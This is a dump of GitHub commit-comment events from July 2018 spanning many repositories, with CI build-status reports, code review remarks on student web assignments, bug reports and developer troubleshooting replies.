{"id":"7931400414","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29627515,"position":null,"line":null,"path":null,"commit_id":"c3325181045b3082690eff766212293083d3ebca","created_at":"2018-07-06T23:51:47Z","updated_at":"2018-07-06T23:51:47Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c3325181045b3082690eff766212293083d3ebca-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T23:51:47Z"}
{"id":"7931403165","type":"CommitCommentEvent","actor":{"login":"flarnie"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29627526,"position":null,"line":null,"path":null,"commit_id":"b4e62956c494703eae944a3a75d187fbbc934e17","created_at":"2018-07-06T23:53:19Z","updated_at":"2018-07-06T23:53:19Z","author_association":"CONTRIBUTOR","body":"> But we know for sure that following a .return chain gives us an accurate stack even if we get into WIP trees because we don't have reparenting.\r\n\r\nI trust you that this is true. It makes sense to me, just haven't worked much myself on the reconciler.\r\n\r\nI **really** like the rename of these methods. SO clear and shiny. Thanks!"}},"created_at":"2018-07-06T23:53:19Z"}
{"id":"7931407508","type":"CommitCommentEvent","actor":{"login":"Phalanx1"},"repo":{"name":"adaneslavo/More-Unique-Components-for-VP"},"payload":{"comment":{"id":29627545,"position":null,"line":null,"path":null,"commit_id":"e6766cdbe4353bbeb11999cda887284b5a765d72","created_at":"2018-07-06T23:55:45Z","updated_at":"2018-07-06T23:55:45Z","author_association":"NONE","body":"In this unit, the YieldFromKills value is the same as the YieldFromBarbarianKills one, while on the Pancerni the YieldFromBarbarianKills value is double that of YieldFromKills. Seeing as both units are supposed to give double yields from barbarians, I can only assume there is an error in one of the files."}},"created_at":"2018-07-06T23:55:45Z"}
{"id":"7931408084","type":"CommitCommentEvent","actor":{"login":"AutomationSys"},"repo":{"name":"Hedydd/ChromisPOS"},"payload":{"comment":{"id":29627547,"position":null,"line":null,"path":null,"commit_id":"7bad8e3f4206a31bdc6e8f1fdba080eef6886a31","created_at":"2018-07-06T23:56:00Z","updated_at":"2018-07-06T23:56:00Z","author_association":"NONE","body":"Hello John B \r\n\r\nGreat work indeed as all time\r\n\r\nI Just want to give a feedback , when i start run it gives me this message \r\n\r\n com.mysql.jdbc.exceptions.jdbc4.MySQLIntegrityConstraintViolationException: Duplicate entry '64' for key 'PRIMARY'\r\n\r\nRunning on windows 7 32bit and netbeans 8.2\r\n\r\nThank you very much \r\n\r\nTamer"}},"created_at":"2018-07-06T23:56:00Z"}
{"id":"7931412190","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29627553,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-06T23:57:40Z","updated_at":"2018-07-06T23:57:40Z","author_association":"NONE","body":"I get this...\r\n```\r\nrake aborted!\r\nDon't know how to build task 'mate'\r\n\r\n(See full trace by running task with --trace)\r\n\r\n```\r\n"}},"created_at":"2018-07-06T23:57:40Z"}
{"id":"7931416168","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29627564,"position":19,"line":19,"path":"lesson8/cargo_wagon.rb","commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-06T23:59:50Z","updated_at":"2018-07-06T23:59:50Z","author_association":"NONE","body":"Эти проверки тоже могут уйти в суперкласс. Их визуальная форма очень похожа в обоих подклассах. По сути, от метода выполняющего схожу функцию в классе PassengerWagon отличается только сообщение, и в одном случае аргументы известны заранее"}},"created_at":"2018-07-06T23:59:50Z"}
{"id":"7926571395","type":"CommitCommentEvent","actor":{"login":"MikaGuraN"},"repo":{"name":"HL4A/hl4a-core"},"payload":{"comment":{"id":29616053,"position":null,"line":null,"path":null,"commit_id":"34d2a990af25e0e28535be1dd4c48e7b5653a0d1","created_at":"2018-07-06T03:00:07Z","updated_at":"2018-07-06T03:00:07Z","author_association":"CONTRIBUTOR","body":"@nobodxbodon 我说的是jse那些的api啦，正在研究javafx呢"}},"created_at":"2018-07-06T03:00:07Z"}
{"id":"7926576098","type":"CommitCommentEvent","actor":{"login":"gdayori"},"repo":{"name":"gdayori/infragistics-wpf-workshop"},"payload":{"comment":{"id":29616071,"position":null,"line":null,"path":null,"commit_id":"6b71d4294cd43bbe2de6e1050083a985620bbb53","created_at":"2018-07-06T03:01:44Z","updated_at":"2018-07-06T03:01:44Z","author_association":"OWNER","body":"close #1"}},"created_at":"2018-07-06T03:01:44Z"}
{"id":"7926579108","type":"CommitCommentEvent","actor":{"login":"cui-jun"},"repo":{"name":"cui-jun/second-repository"},"payload":{"comment":{"id":29616080,"position":null,"line":null,"path":null,"commit_id":"128d7f730df9f189b8a28b02e2f1e666f77c98f6","created_at":"2018-07-06T03:02:53Z","updated_at":"2018-07-06T03:02:53Z","author_association":"OWNER","body":"try to comment on my update"}},"created_at":"2018-07-06T03:02:53Z"}
{"id":"7926581535","type":"CommitCommentEvent","actor":{"login":"Zhangxu-SE"},"repo":{"name":"Zhangxu-SE/hello-world"},"payload":{"comment":{"id":29616082,"position":null,"line":null,"path":null,"commit_id":"3dfa56268c2e1bbc4af45936cd479d435a919c09","created_at":"2018-07-06T03:03:53Z","updated_at":"2018-07-06T03:03:53Z","author_association":"OWNER","body":"add ABC folder and delete test.txt file"}},"created_at":"2018-07-06T03:03:53Z"}
{"id":"7926584209","type":"CommitCommentEvent","actor":{"login":"Zhangxu-SE"},"repo":{"name":"Zhangxu-SE/hello-world"},"payload":{"comment":{"id":29616086,"position":null,"line":null,"path":null,"commit_id":"3dfa56268c2e1bbc4af45936cd479d435a919c09","created_at":"2018-07-06T03:04:58Z","updated_at":"2018-07-06T03:04:58Z","author_association":"OWNER","body":"add ABC folder and delete test.txt file"}},"created_at":"2018-07-06T03:04:58Z"}
{"id":"7926584385","type":"CommitCommentEvent","actor":{"login":"Benjamintf1"},"repo":{"name":"Benjamintf1/queue-app"},"payload":{"comment":{"id":29616087,"position":null,"line":null,"path":null,"commit_id":"371d3bdba9c3b7c54e72d96d1440e1a679ac1c07","created_at":"2018-07-06T03:05:02Z","updated_at":"2018-07-06T03:05:02Z","author_association":"OWNER","body":"Wait, that was it?\r\n"}},"created_at":"2018-07-06T03:05:02Z"}
{"id":"7926592544","type":"CommitCommentEvent","actor":{"login":"cdzyp"},"repo":{"name":"cdzyp/token-profile"},"payload":{"comment":{"id":29616098,"position":null,"line":null,"path":null,"commit_id":"c22886260a0979e46a56c77031e129a2142eb1c0","created_at":"2018-07-06T03:08:13Z","updated_at":"2018-07-06T03:08:13Z","author_association":"OWNER","body":"![_20180706104335](https://user-images.githubusercontent.com/31403697/42357939-dd9913c6-810c-11e8-8430-1b5fc158e2f6.png)\r\n"}},"created_at":"2018-07-06T03:08:13Z"}
{"id":"7926597510","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29616105,"position":25,"line":129,"path":"src/cryptonote_protocol/cryptonote_protocol_handler.h","commit_id":"97a25b98c1dd440fb3f4e5b6398680ae53a523fc","created_at":"2018-07-06T03:10:14Z","updated_at":"2018-07-06T03:10:14Z","author_association":"COLLABORATOR","body":"votes"}},"created_at":"2018-07-06T03:10:14Z"}
{"id":"7926598164","type":"CommitCommentEvent","actor":{"login":"CyrCom"},"repo":{"name":"roymacdonald/ofxGLWarper"},"payload":{"comment":{"id":29616106,"position":null,"line":null,"path":null,"commit_id":"66e73edad6fa52c32f7a0216c523ac199dd3dc89","created_at":"2018-07-06T03:10:25Z","updated_at":"2018-07-06T03:10:25Z","author_association":"CONTRIBUTOR","body":"Hey,\r\nI think this doesn't change the problem, if the origin is (0,0) it works flawlessly but otherwise not.\r\nI spend a lot of time tonight trying to understand.\r\nIt seems like OpenCv deprecated the use of cvMat for Mat, and cvFindHomography for findHomography but I didn't succeed in updating all the functions, especially cvSetData.\r\n\r\nBut check my branch out:\r\nhttps://github.com/CyrCom/ofxGLWarper/commit/9c5ddb36f39e786254ce1983658a0830c2b0341c\r\n\r\nFinally I got it to work without openCV and with a file that Arturo wrote that is also used in ofxPiMapper and other addons. It is supposed to be a bit lighter, and at least for readability, it is.\r\n\r\nThe sad part is that it is the exact same results, but maybe we'll figure it out,\r\n or always use (0,0) and move afterwards. ( I added a method for moving all 4 points at once)"}},"created_at":"2018-07-06T03:10:25Z"}
{"id":"7926599793","type":"CommitCommentEvent","actor":{"login":"Handy045"},"repo":{"name":"Handy045/HandyQRCode"},"payload":{"comment":{"id":29616107,"position":null,"line":null,"path":null,"commit_id":"1e8d7c3819031badace8e42fda53cc5e49e252de","created_at":"2018-07-06T03:11:00Z","updated_at":"2018-07-06T03:11:00Z","author_association":"OWNER","body":"更新了SnackBarUtils注释，引用自：https://github.com/Blankj/AndroidUtilCode/blob/master/utilcode/src/main/java/com/blankj/utilcode/util/SnackbarUtils.java"}},"created_at":"2018-07-06T03:11:00Z"}
{"id":"7926601836","type":"CommitCommentEvent","actor":{"login":"marsdeck"},"repo":{"name":"marsdeck/AFMech-Suite"},"payload":{"comment":{"id":29616110,"position":2,"line":2,"path":"README.md","commit_id":"d490822f04575f3b691048b92a7746a97f5173f6","created_at":"2018-07-06T03:11:50Z","updated_at":"2018-07-06T03:11:50Z","author_association":"OWNER","body":"MATLAB Compiler\r\n\r\n1. Prerequisites for Deployment \r\n\r\n. Verify the MATLAB Runtime is installed and ensure you    \r\n  have installed version 9.2 (R2017a).   \r\n\r\n. If the MATLAB Runtime is not installed, do the following:\r\n  (1) enter\r\n  \r\n      >>mcrinstaller\r\n      \r\n      at MATLAB prompt. The MCRINSTALLER command displays the \r\n      location of the MATLAB Runtime installer.\r\n\r\n  (2) run the MATLAB Runtime installer.\r\n\r\nOr download the Windows 64-bit version of the MATLAB Runtime for R2017a \r\nfrom the MathWorks Web site by navigating to\r\n\r\n   http://www.mathworks.com/products/compiler/mcr/index.html\r\n   \r\n   \r\nFor more information about the MATLAB Runtime and the MATLAB Runtime installer, see \r\nPackage and Distribute in the MATLAB Compiler documentation  \r\nin the MathWorks Documentation Center.    \r\n\r\n\r\nNOTE: You will need administrator rights to run MCRInstaller. \r\n\r\n\r\n2. Files to Deploy and Package\r\n\r\nFiles to package for Standalone \r\n================================\r\n-AFMech_suite.exe\r\n-MCRInstaller.exe \r\n   -if end users are unable to download the MATLAB Runtime using the above  \r\n    link, include it when building your component by clicking \r\n    the \"Runtime downloaded from web\" link in the Deployment Tool\r\n-This readme file \r\n\r\n3. Definitions\r\n\r\nFor information on deployment terminology, go to \r\nhttp://www.mathworks.com/help. Select MATLAB Compiler >   \r\nGetting Started > About Application Deployment > \r\nDeployment Product Terms in the MathWorks Documentation \r\nCenter."}},"created_at":"2018-07-06T03:11:50Z"}
{"id":"7926606477","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616117,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-06T03:13:45Z","updated_at":"2018-07-06T03:13:45Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T03:13:45Z"}
{"id":"7926606797","type":"CommitCommentEvent","actor":{"login":"Yugp4"},"repo":{"name":"Yugp4/java_perfeng"},"payload":{"comment":{"id":29616118,"position":null,"line":null,"path":null,"commit_id":"ecc8740ad1814eb4c3240a10d1fe6eb74dd0db2c","created_at":"2018-07-06T03:13:54Z","updated_at":"2018-07-06T03:13:54Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-06T03:13:54Z"}
{"id":"7926607179","type":"CommitCommentEvent","actor":{"login":"shawnchain"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29616119,"position":5,"line":84,"path":"DMRLookup.cpp","commit_id":"9d6bcb7ec880d8b8a97e4b9383724e57f31948fb","created_at":"2018-07-06T03:14:04Z","updated_at":"2018-07-06T03:14:04Z","author_association":"CONTRIBUTOR","body":"Can not tell the difference of 2 functions of findWithName and find, all looks find by id."}},"created_at":"2018-07-06T03:14:04Z"}
{"id":"7926609152","type":"CommitCommentEvent","actor":{"login":"kurrytran32"},"repo":{"name":"loftusjl/Project1"},"payload":{"comment":{"id":29616123,"position":null,"line":null,"path":null,"commit_id":"28b9fb0ee82b9714ed6c4827bfdc09a89930fa65","created_at":"2018-07-06T03:14:53Z","updated_at":"2018-07-06T03:14:53Z","author_association":"COLLABORATOR","body":"I don't know how you ccould have changed the binary file?"}},"created_at":"2018-07-06T03:14:53Z"}
{"id":"7926611445","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616130,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-06T03:15:49Z","updated_at":"2018-07-06T03:15:49Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T03:15:49Z"}
{"id":"7926614583","type":"CommitCommentEvent","actor":{"login":"DebChanda"},"repo":{"name":"DebChanda/Cartoon-Downloader"},"payload":{"comment":{"id":29616132,"position":null,"line":null,"path":null,"commit_id":"6b19beadb4ee5cfa3e2247c4080edd708db7fcaf","created_at":"2018-07-06T03:17:07Z","updated_at":"2018-07-06T03:17:07Z","author_association":"OWNER","body":"You will feel the speed!"}},"created_at":"2018-07-06T03:17:07Z"}
{"id":"7926615671","type":"CommitCommentEvent","actor":{"login":"taoxinyi"},"repo":{"name":"pyca/cryptography"},"payload":{"comment":{"id":29616135,"position":null,"line":null,"path":null,"commit_id":"0517d1ae49061f486e2e4d279d70b6b61361de2f","created_at":"2018-07-06T03:17:33Z","updated_at":"2018-07-06T03:17:33Z","author_association":"NONE","body":"@attex Same, did you solve this?"}},"created_at":"2018-07-06T03:17:33Z"}
{"id":"7926616553","type":"CommitCommentEvent","actor":{"login":"filipesilva"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":29616137,"position":null,"line":null,"path":null,"commit_id":"75311c2a4541cd498b5376e1a5e79f515a8c7d79","created_at":"2018-07-06T03:17:55Z","updated_at":"2018-07-06T03:17:55Z","author_association":"MEMBER","body":"No, as far as I can tell it's been removed in 6.x because of some incompatibilities we had with plugins. We hope to re-add it in the future."}},"created_at":"2018-07-06T03:17:55Z"}
{"id":"7926623841","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29616158,"position":null,"line":null,"path":null,"commit_id":"11d3f513e2a6a287e09cdfe45b565de82d6ebe17","created_at":"2018-07-06T03:20:51Z","updated_at":"2018-07-06T03:20:51Z","author_association":"NONE","body":"HotFix-FailingHXUnitTest (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11d3f513e2a6a287e09cdfe45b565de82d6ebe17-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T03:20:51Z"}
{"id":"7926642256","type":"CommitCommentEvent","actor":{"login":"hanmin157156"},"repo":{"name":"hanmin157156/app_day08"},"payload":{"comment":{"id":29616192,"position":1,"line":1,"path":"b.txt","commit_id":"dd39a33ac46488723b15b46570cfb07ef98cff5f","created_at":"2018-07-06T03:28:27Z","updated_at":"2018-07-06T03:28:27Z","author_association":"OWNER","body":"asasa\r\n"}},"created_at":"2018-07-06T03:28:27Z"}
{"id":"7926643462","type":"CommitCommentEvent","actor":{"login":"fiasco"},"repo":{"name":"govCMS/audit-site"},"payload":{"comment":{"id":29616195,"position":null,"line":null,"path":null,"commit_id":"06d85b2e9782ea024a1014a0e6c438d565653f51","created_at":"2018-07-06T03:29:00Z","updated_at":"2018-07-06T03:29:00Z","author_association":"COLLABORATOR","body":"ha no it wasn't! that'll learn me for coding at night!"}},"created_at":"2018-07-06T03:29:00Z"}
{"id":"7926644257","type":"CommitCommentEvent","actor":{"login":"laksono"},"repo":{"name":"HPCToolkit/hpctoolkit"},"payload":{"comment":{"id":29616197,"position":null,"line":null,"path":null,"commit_id":"3385f1468bc1a477acbaf8002cb25075ed945b21","created_at":"2018-07-06T03:29:18Z","updated_at":"2018-07-06T03:29:18Z","author_association":"MEMBER","body":"I agree that both the comment and the code aren't clear.\n\nWe allow two options in hpcrun: *compact threads* (default) and *non-compact\nthreads* (what we have right now).\nWhat's going on inside thread_fini:\n\n   - In compact threads mode: reuse the thread data, and mark the end of\n   the thread in the trace.\n   - In non-compact mode: write hpcrun profile data, close hpctrace data.\n   That's it. No need to mark the end of the trace.\n\nThe draft code should reflect that, but it isn't well written so it looks\nconfusing.\nThe problem is that the function hpcrun_threadMgr_data_put also writes\nhpcrun profile data (if it's in non-compact mode). I think this is the\nsource of misunderstanding.\n\nOn Thu, Jul 5, 2018 at 9:51 PM John Mellor-Crummey <notifications@github.com>\nwrote:\n\n> I don't understand the code below. You put the td into the thread manager\n> even if it is not a compact thread. For a non-compact thread, you quit\n> after you put td into the queue. By putting it into the queue, you may\n> reuse it as if it were a compact thread. However, you don't put markers\n> around the trace data because that happens after you return.\n>\n> // case 1: for compact and non-compact threads:\n> // save the data in the queue. We may reuse again later.\n> //  call hpcrun_threadMgr_data_put() to finalize the thread\n> // writing the profile will be performed later in hpcrun_fini_internal\n> //  if it's a compact thread, we write the profile data\n> // unless there's a shutdown or cancellation, we need to write the\n> //  otherwise we enqueue the data to the list\n> //  the profile here\t\t\n>   \t\t\n>       thread_data_t* td = hpcrun_get_thread_data();\t\t\n>       hpcrun_threadMgr_data_put(td);\t\t\n>   \t\t\n>       if (hpcrun_threadMgr_compact_thread() == OPTION_NO_COMPACT_THREAD) {\t\t    \t\t\n>          return;\n>       }\t\t\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/HPCToolkit/hpctoolkit/commit/3385f1468bc1a477acbaf8002cb25075ed945b21#commitcomment-29616022>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIX86Goyn4zPlSfdpBbghqN5Dmf7EcbSks5uDtDKgaJpZM4VEzks>\n> .\n>\n"}},"created_at":"2018-07-06T03:29:18Z"}
{"id":"7926644790","type":"CommitCommentEvent","actor":{"login":"summer095"},"repo":{"name":"summer095/summer5"},"payload":{"comment":{"id":29616200,"position":null,"line":null,"path":null,"commit_id":"abfad106f9321007e6ba7bbd15782088b11b1eb3","created_at":"2018-07-06T03:29:33Z","updated_at":"2018-07-06T03:29:33Z","author_association":"OWNER","body":"meiliyou"}},"created_at":"2018-07-06T03:29:33Z"}
{"id":"7926647117","type":"CommitCommentEvent","actor":{"login":"aehmttw"},"repo":{"name":"aehmttw/TankGame"},"payload":{"comment":{"id":29616210,"position":null,"line":null,"path":null,"commit_id":"0817b382c512cb4afbd29dcc2c85ea05af46be07","created_at":"2018-07-06T03:30:27Z","updated_at":"2018-07-06T03:30:27Z","author_association":"OWNER","body":"Also re-added the AI of dark red and black tanks of avoiding/strafing the player."}},"created_at":"2018-07-06T03:30:27Z"}
{"id":"7926650368","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29616213,"position":25,"line":15,"path":"019/1901.html","commit_id":"49ea15c83ee3ca95546f81a07cd32d65260e8298","created_at":"2018-07-06T03:31:49Z","updated_at":"2018-07-06T03:31:49Z","author_association":"COLLABORATOR","body":"@c-osanai \r\n今作ろうとしている if 文の箇所だけに集中してみてみましょう。\r\n\r\n試しに`2つ目`の条件式を取り出してみました。\r\n```\r\nif (top > fadeInPoints[1]) {\r\n      $('#box02').fadeIn('800');\r\n}\r\n```\r\n次に`3つ目`です。\r\n```\r\nif (top > fadeInPoints[3]) {\r\n        $('#box04').fadeIn('800');\r\n}\r\n```\r\nこの二つに`規則性` を発見できるとeachに置き換えることができます。\r\n何か見つけられますでしょうか？\r\n\r\nもし詰まることありましたら明日対面で解消でも良さそうかなと思ってます。\r\n手が空いてしまうことありましたらこちら\r\nhttps://github.com/c-osanai/techdrive/issues/18\r\n取り組んでみてくださいませ。"}},"created_at":"2018-07-06T03:31:49Z"}
{"id":"7926651735","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"JerryTsang/android_kernel_sharp_msm8974"},"payload":{"comment":{"id":29616215,"position":null,"line":null,"path":null,"commit_id":"c2ba89c6b256cc21ae077888e3248121a5789cb3","created_at":"2018-07-06T03:32:22Z","updated_at":"2018-07-06T03:32:22Z","author_association":"OWNER","body":"https://github.com/JerryTsang/android_kernel_sharp_msm8974/commit/f6726c180b8f6a9ef8ae06d1d8d4fa08a7f343fd"}},"created_at":"2018-07-06T03:32:22Z"}
{"id":"7926653130","type":"CommitCommentEvent","actor":{"login":"danruonan"},"repo":{"name":"danruonan/app_008"},"payload":{"comment":{"id":29616217,"position":null,"line":null,"path":null,"commit_id":"dcff6d5bc20bee40cf9de81978989b74cd293ded","created_at":"2018-07-06T03:32:56Z","updated_at":"2018-07-06T03:32:56Z","author_association":"OWNER","body":"hyym"}},"created_at":"2018-07-06T03:32:56Z"}
{"id":"7926654814","type":"CommitCommentEvent","actor":{"login":"Walker-Wu"},"repo":{"name":"Walker-Wu/wuktest"},"payload":{"comment":{"id":29616218,"position":null,"line":null,"path":null,"commit_id":"5e74a39a057ac134b0de27dfea996388886faa05","created_at":"2018-07-06T03:33:39Z","updated_at":"2018-07-06T03:33:39Z","author_association":"OWNER","body":"增加一行"}},"created_at":"2018-07-06T03:33:39Z"}
{"id":"7926655250","type":"CommitCommentEvent","actor":{"login":"dandv"},"repo":{"name":"Preposterous/twitter-lite"},"payload":{"comment":{"id":29616219,"position":10,"line":61,"path":"README.md","commit_id":"f2b17b25594543bba8063b7b2c76423531feac2a","created_at":"2018-07-06T03:33:51Z","updated_at":"2018-07-06T03:33:51Z","author_association":"COLLABORATOR","body":"These formatting changes were made automatically by `npm run precommit`."}},"created_at":"2018-07-06T03:33:51Z"}
{"id":"7926664270","type":"CommitCommentEvent","actor":{"login":"hotwords123"},"repo":{"name":"Bardisk/Header_Fighter"},"payload":{"comment":{"id":29616233,"position":null,"line":null,"path":null,"commit_id":"48df266e955e334c96c8cb97fd37aeeae1044aa2","created_at":"2018-07-06T03:37:42Z","updated_at":"2018-07-06T03:37:42Z","author_association":"COLLABORATOR","body":"it should be \"unused\" instead of \"unuse\""}},"created_at":"2018-07-06T03:37:42Z"}
{"id":"7926667015","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29616235,"position":null,"line":null,"path":null,"commit_id":"7163bf9323618728a548aaaf133a93581db541f6","created_at":"2018-07-06T03:38:52Z","updated_at":"2018-07-06T03:38:52Z","author_association":"MEMBER","body":"oops commit message should be **not respecting**"}},"created_at":"2018-07-06T03:38:52Z"}
{"id":"7926667127","type":"CommitCommentEvent","actor":{"login":"wjllz20"},"repo":{"name":"maxulloa/Matriculacion2"},"payload":{"comment":{"id":29616236,"position":null,"line":null,"path":null,"commit_id":"b62d0e6e0375917145ffafe07851ae7eb066727d","created_at":"2018-07-06T03:38:54Z","updated_at":"2018-07-06T03:38:54Z","author_association":"COLLABORATOR","body":"creacion de docentes"}},"created_at":"2018-07-06T03:38:54Z"}
{"id":"7926668945","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"sadeshbodake/Web-design"},"payload":{"comment":{"id":29616239,"position":19,"line":22,"path":"task1.html","commit_id":"9789952cba2a093505af9417ab66808254f0dbcd","created_at":"2018-07-06T03:39:40Z","updated_at":"2018-07-06T03:39:40Z","author_association":"NONE","body":"Why <br> ?  If you use a block element such as h1 or h2 and then place subheading below it using a <p>, it would be more useful. Refactor this code"}},"created_at":"2018-07-06T03:39:40Z"}
{"id":"7926671654","type":"CommitCommentEvent","actor":{"login":"reaperhulk"},"repo":{"name":"pyca/cryptography"},"payload":{"comment":{"id":29616242,"position":null,"line":null,"path":null,"commit_id":"0517d1ae49061f486e2e4d279d70b6b61361de2f","created_at":"2018-07-06T03:40:53Z","updated_at":"2018-07-06T03:40:53Z","author_association":"MEMBER","body":"The issue is likely that you have multiple copies of cffi installed in your python paths. Try installing cryptography in a new virtualenv and if the problem goes away then it is your existing environment. "}},"created_at":"2018-07-06T03:40:53Z"}
{"id":"7926674492","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"ravindra-karale/html-assignmnet"},"payload":{"comment":{"id":29616243,"position":4,"line":4,"path":"assignment-3/css/style.css","commit_id":"1ca025265874641f7a7142b54546a76a8edb3a80","created_at":"2018-07-06T03:42:03Z","updated_at":"2018-07-06T03:42:03Z","author_association":"NONE","body":"Why is this property blank? Either remove it or use it with some purpose"}},"created_at":"2018-07-06T03:42:03Z"}
{"id":"7926677061","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616247,"position":98,"line":98,"path":"assign1.css","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:43:11Z","updated_at":"2018-07-06T03:43:11Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-06T03:43:11Z"}
{"id":"7926678198","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616249,"position":125,"line":125,"path":"assign1.css","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:43:39Z","updated_at":"2018-07-06T03:43:39Z","author_association":"NONE","body":"Check whole indentation"}},"created_at":"2018-07-06T03:43:39Z"}
{"id":"7926678772","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616251,"position":131,"line":131,"path":"assign1.css","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:43:54Z","updated_at":"2018-07-06T03:43:54Z","author_association":"NONE","body":"Use meaningful class names "}},"created_at":"2018-07-06T03:43:54Z"}
{"id":"7926679416","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616254,"position":138,"line":138,"path":"assign1.css","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:44:11Z","updated_at":"2018-07-06T03:44:11Z","author_association":"NONE","body":"Again Indentation"}},"created_at":"2018-07-06T03:44:11Z"}
{"id":"7926680393","type":"CommitCommentEvent","actor":{"login":"MaheshLamdade"},"repo":{"name":"aniketkhara/overlay"},"payload":{"comment":{"id":29616255,"position":8,"line":8,"path":"media.html","commit_id":"c879e84d06347e3a67b6b8eb5c263513d19fc3a3","created_at":"2018-07-06T03:44:34Z","updated_at":"2018-07-06T03:44:34Z","author_association":"NONE","body":"Indentation"}},"created_at":"2018-07-06T03:44:34Z"}
